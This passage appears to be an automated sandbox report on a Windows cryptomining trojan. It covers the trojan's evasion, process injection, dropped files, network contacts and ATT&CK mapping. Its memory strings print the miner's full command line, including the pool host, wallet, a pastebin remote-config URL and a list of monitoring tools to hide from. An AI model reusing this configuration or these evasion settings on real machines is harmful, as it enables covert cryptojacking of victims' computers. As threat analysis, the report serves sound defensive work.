                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: svchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="89K2CPJXMR6JYXNGSGCDG3V9SXAZSM9PAEK7IW7U9HRAAUZC4LP6WLQBSU5GRBGBTUWFIDACEEVFX5V7UMZVFZNKRJXW8WK" --PASS="" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="MMXEBLQZPFKL.SYS" --RANDOMX-NO-RDMSR --CINIT-REMOTE-CONFIG="HTTPS://PASTEBIN.COM/RAW/7UFXNEU9" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="TJENYUBSYWJXJNHY"
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                  Source: svchost.exe, 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTTPS://PASTEBIN.COM/RAW/7UFXNEU9TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXETJENYUBSYWJXJNHY
                  Source: svchost.exe, 0000000C.00000003.1252525883.00000239B6669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=89K2CPJXMR6JYXNGSGCDG3V9SXAZSM9PAEK7IW7U9HRAAUZC4LP6WLQBSU5GRBGBTUWFIDACEEVFX5V7UMZVFZNKRJXW8WK--PASS=--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=MMXEBLQZPFKL.SYS--RANDOMX-NO-RDMSR--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/7UFXNEU9--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=TJENYUBSYWJXJNHY
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE06
                  Source: svchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE CD
                  Source: svchost.exe, 0000000C.00000002.2457793221.00000239B5E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %SYSTEMROOT%\SYSTEM32\WBEM\FASTPROX.DLLTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXETION
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457793221.00000239B5E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2458192691.00000239B6673000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                  Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                  Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 723Jump to behavior
                  Source: C:\ProgramData\helper\helper.exeDropped PE file which has not been started: C:\Windows\Temp\mmxeblqzpfkl.sysJump to dropped file
                  Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
                  Source: C:\Windows\System32\svchost.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exe TID: 7816Thread sleep time: -165000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7188Thread sleep count: 723 > 30Jump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                  Source: svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD L2CAP [Bluetooth]Hyper-V RAW
                  Source: svchost.exe, 00000000.00000002.2458662747.000001F95BA3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: svchost.exe, 00000000.00000002.2458717605.000001F95BA52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000000.00000002.2456958826.000001F95642B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000000C.00000002.2457604941.00000239B5E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,11_2_0000000140001160

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\ProgramData\helper\helper.exeThread register set: target process: 8060Jump to behavior
                  Source: C:\ProgramData\helper\helper.exeThread register set: target process: 8072Jump to behavior
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000001403274D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00000001403274D0

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                  Source: svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                  Windows Management Instrumentation
                  11
                  Windows Service
                  11
                  Windows Service
                  2
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Service Execution
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Disable or Modify Tools
                  LSASS Memory351
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  14
                  Virtualization/Sandbox Evasion
                  Security Account Manager14
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials24
                  System Information Discovery
                  VNCGUI Input Capture3
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635471 Sample: nbtypsfikkad.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 51 xmr-eu1.nanopool.org 2->51 53 pastebin.com 2->53 55 2 other IPs or domains 2->55 63 Suricata IDS alerts for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 73 4 other signatures 2->73 8 helper.exe 1 2->8         started        12 nbtypsfikkad.exe 2 2->12         started        14 svchost.exe 2->14         started        16 5 other processes 2->16 signatures3 69 DNS related to crypt mining pools 51->69 71 Connects to a pastebin service (likely for C&C) 53->71 process4 dnsIp5 45 C:\Windows\Temp\mmxeblqzpfkl.sys, PE32+ 8->45 dropped 79 Multi AV Scanner detection for dropped file 8->79 81 Found strings related to Crypto-Mining 8->81 83 Modifies the context of a thread in another process (thread injection) 8->83 85 Sample is not signed and drops a device driver 8->85 19 svchost.exe 8->19         started        23 conhost.exe 8->23         started        47 C:\ProgramData\helper\helper.exe, PE32+ 12->47 dropped 25 sc.exe 1 12->25         started        27 sc.exe 1 12->27         started        29 sc.exe 1 12->29         started        31 sc.exe 1 12->31         started        87 Changes security center settings (notifications, updates, antivirus, firewall) 14->87 33 MpCmdRun.exe 1 14->33         started        49 127.0.0.1 unknown unknown 16->49 file6 signatures7 process8 dnsIp9 57 141.94.23.83, 10343, 49711 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 19->57 59 pastebin.com 104.20.3.235, 443, 49712 CLOUDFLARENETUS United States 19->59 61 162.19.224.121, 10343, 49715 CENTURYLINK-US-LEGACY-QWESTUS United States 19->61 75 Query firmware table information (likely to detect VMs) 19->75 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->77 35 conhost.exe 25->35         started        37 conhost.exe 27->37         started        39 conhost.exe 29->39         started        41 conhost.exe 31->41         started        43 conhost.exe 33->43         started        signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  nbtypsfikkad.exe70%VirustotalBrowse
                  nbtypsfikkad.exe76%ReversingLabsWin64.Packed.Generic
                  SourceDetectionScannerLabelLink
                  C:\ProgramData\helper\helper.exe76%ReversingLabsWin64.Packed.Generic
                  C:\Windows\Temp\mmxeblqzpfkl.sys5%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://crl.cloudflare.com/origin_ca.crle0%Avira URL Cloudsafe
                  http://crl.cloudflare.com/origin_ca.crlqd0%Avira URL Cloudsafe
                  http://crl.cloudflare.com/origin_ca.crl00%Avira URL Cloudsafe
                  http://crl.cloudflare.com/origin_ca.crl0%Avira URL Cloudsafe

                  Download Network PCAP: filteredfull

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  xmr-eu1.nanopool.org
                  146.59.154.106
                  truefalse
                    high
                    pastebin.com
                    104.20.3.235
                    truefalse
                      high
                      206.23.85.13.in-addr.arpa
                      unknown
                      unknownfalse
                        high
                        212.20.149.52.in-addr.arpa
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://pastebin.com/raw/7ufXNeU9false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000000.00000003.1203751734.000001F95B8E6000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.cloudflare.com/origin_ca.crlesvchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://crl.cloudflare.com/origin_ca.crlqdsvchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://pastebin.com/raw/7ufXNeU9esvchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.cloudflare.com/origin_ca0svchost.exe, 0000000C.00000002.2458337362.00000239B66CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.cloudflare.com/origin_ca.crlsvchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://xmrig.com/docs/algorithmshelper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.cloudflare.com/origin_ca.crl0svchost.exe, 0000000C.00000002.2458337362.00000239B66CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.ver)svchost.exe, 00000000.00000002.2458802371.000001F95BA86000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.cloudflare.com/origin_casvchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000000.00000003.1203751734.000001F95B933000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1203751734.000001F95B997000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://pastebin.com/raw/7ufXNeU9Taskmgr.exesvchost.exe, 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://pastebin.com/raw/7ufXNeU9--cinit-stealth-targets=Taskmgr.exesvchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.20.3.235
                                                    pastebin.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    141.94.23.83
                                                    unknownGermany
                                                    680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                    162.19.224.121
                                                    unknownUnited States
                                                    209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                    IP
                                                    127.0.0.1
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1635471
                                                    Start date and time:2025-03-11 17:43:55 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 2s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:21
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:nbtypsfikkad.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.mine.winEXE@27/7@4/4
                                                    EGA Information:
                                                    • Successful, ratio: 25%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.149.20.212, 13.85.23.206, 4.245.163.56
                                                    • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target helper.exe, PID 8032 because it is empty
                                                    • Execution Graph export aborted for target nbtypsfikkad.exe, PID 7812 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 8072 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    TimeTypeDescription
                                                    12:44:55API Interceptor2x Sleep call for process: svchost.exe modified
                                                    12:44:55API Interceptor1x Sleep call for process: nbtypsfikkad.exe modified
                                                    12:46:04API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):1.307376690246451
                                                    Encrypted:false
                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrL:KooCEYhgYEL0In
                                                    MD5:F0F2FDE424E62828131921D14DB760D8
                                                    SHA1:A116A1B3E79E6C8BFE8068754E72C20596A155AC
                                                    SHA-256:87A4F0490DF096461F0E55400978ABA763771794B096BBC03E5A62084E0A3898
                                                    SHA-512:457DFD71BF8E87F6C9CE801589DEB794EB686C90D2DECFA891CBE8CE42D7D8ADE8379CF13459BAF1B9BF93D68611A432165ED1EBD438EF953D622ACAF1306A9B
                                                    Malicious:false
                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x79e108f5, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):0.42217127831250373
                                                    Encrypted:false
                                                    SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                    MD5:21AD49D71CAACE20D66150186CE30152
                                                    SHA1:F335D728DEE93E550979D872DBB03457E6DD39F1
                                                    SHA-256:579EA16A23CD98BF036102D94213D827E796791922A6127F63A84EC14413968A
                                                    SHA-512:D2D1D909C1740ACB37255AB4C2E3F267AC6BFE1A63DD161E762CA30583F46E05B151F7B888C493DF08B9A525B98F349C97F21F176F34536058B37B90A0318404
                                                    Malicious:false
                                                    Preview:y...... .......A.......X\...;...{......................0.!..........{A.7,...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................E.7,...}....................7,...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.07694654765132056
                                                    Encrypted:false
                                                    SSDEEP:3:il6Yeldouajn13a/E/llollcVO/lnlZMxZNQl:pzlKua53qkAOewk
                                                    MD5:4E7A7C34001732115314692BDC204011
                                                    SHA1:17812F9E39D8A000A17920284C787C467B8FFFC4
                                                    SHA-256:3127D89BA452B95B99AA040D9BDDEF63288495292D54FD6A6D355FB3CF0E6766
                                                    SHA-512:D9CB84C449C2C7FE1A70995371B67D735DE800D55665CA0A5CEB2487D2EA0C1420C7A98AE24E32211D5138DBC97A714C702DFF149B13C53A26D40F54100176FF
                                                    Malicious:false
                                                    Preview:.ZB......................................;...{..7,...}.......{A..............{A......{A..........{A]...................7,...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\nbtypsfikkad.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):7113728
                                                    Entropy (8bit):6.4701650998152225
                                                    Encrypted:false
                                                    SSDEEP:196608:FMk+nb1nuqMbwhIEkfnpmLA9EFRJouTX:FSrkfnsLAeRr
                                                    MD5:8BBC3CCA3905E7ADA419A806DE48006C
                                                    SHA1:D9527797784197257A37C743DA36F4DE8197E924
                                                    SHA-256:76DE12FC1C2446150168CCB2520DEA6B5F30AB53FB5CFAE8926ABCEBF5C8364D
                                                    SHA-512:66F9D6BD184BE4E70ACDA9EA2A5757FB6FF31E76CF895B01143E2FBF3A342F1A14492EF8AD08BA27F323AB1EDE351EAB7F1F57EFA35EF7978A2E80442D11BFCD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....T.g.........."......d...$l.....@..........@..............................l...........`.....................................................<.............l...............l.x...............................(.......8...........X...X............................text....b.......d.................. ..`.rdata...............h..............@..@.data.....l.......l.................@....pdata........l.......l.............@..@.00cfg........l.......l.............@..@.tls..........l.......l.............@....reloc..x.....l.......l.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
